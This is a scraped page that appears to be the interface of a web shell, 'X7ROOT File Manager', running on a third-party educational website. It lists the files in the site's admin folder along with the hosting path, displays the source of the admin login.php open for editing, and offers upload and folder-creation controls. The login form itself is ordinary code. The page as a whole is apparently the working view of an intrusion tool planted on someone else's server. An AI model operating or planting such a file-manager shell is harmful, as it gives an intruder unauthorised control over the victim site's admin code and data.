X7ROOT File Manager
Current Path:
/home/u126090504/domains/bpcaodisha.com/public_html/admin
home
/
u126090504
/
domains
/
bpcaodisha.com
/
public_html
/
admin
/
📁
..
📄
banner.php
(4.13 KB)
📄
code.php
(13.72 KB)
📁
css
📁
database
📁
faculty
📄
fboard.php
(7.32 KB)
📄
fboard_edit.php
(4.04 KB)
📁
files
📄
galleryedit.php
(4.2 KB)
📁
galleryimages
📁
imagedata
📁
img
📁
includes
📄
index.php
(4.08 KB)
📁
js
📄
login.php
(1.97 KB)
📄
logincode.php
(614 B)
📄
logout.php
(81 B)
📄
nboard.php
(4.91 KB)
📄
nboard_edit.php
(1.96 KB)
📄
rcode.php
(1.49 KB)
📄
register.php
(4.08 KB)
📄
register_edit.php
(2.02 KB)
📁
scss
📄
security.php
(168 B)
📁
vendor
📄
viewcontact.php
(2.82 KB)
Editing: login.php
<?php include('includes/header.php'); include('database/dbconfig.php'); ?> <style> html { background-color: #b4a6ff73; } .login-container { background-color: #b4a6ff73; } .brand_logo { width: 350px; border: 2px solid #e05252; margin-bottom: 16px; } .login-area { background-color: #f6e5ff; ; } </style> <div class="container"> <!-- Outer Row --> <div class="row justify-content-center"> <div class="col-xl-6 col-lg-6 col-md-6"> <div class="card o-hidden border-0 shadow-lg my-5"> <div class="card-body p-0"> <!-- Nested Row within Card Body --> <div class="row login-area"> <div class="col-lg-12"> <div class="p-5"> <div class="text-center"> <img src="img/logo.png" class="brand_logo" alt="Logo"> </div> <form class="user" action="logincode.php" method="POST"> <div class="form-group"> <input type="email" name="emaill" style="font-weight:bold;color:black" class="form-control form-control-user" placeholder="Enter Email Address"> </div> <div class="form-group"> <input type="password" name="passwordd" style="font-weight:bold;color:black" class="form-control form-control-user" placeholder="Password"> </div> <button type="submit" name="login_btn" class="btn btn-primary btn-user btn-block"> Login </button> <hr> <div class="form-group"> <br><br> <h6 style="text-align: center; margin-top: -8%;color:#272626;;font-weight:bold">Design and Developed by Eduweb</h6> </div> </form> </div> </div> </div> </div> </div> </div> </div> </div> <?php include('includes/scripts.php'); ?>
Upload File
Create Folder